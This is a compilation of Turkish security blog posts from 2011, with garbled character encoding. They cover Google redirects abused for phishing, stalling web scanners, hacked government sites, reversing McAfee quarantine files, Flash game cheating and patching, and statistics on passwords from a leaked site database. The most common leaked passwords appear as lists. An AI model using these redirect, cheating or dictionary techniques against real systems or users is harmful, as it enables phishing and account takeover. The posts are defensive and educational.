Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

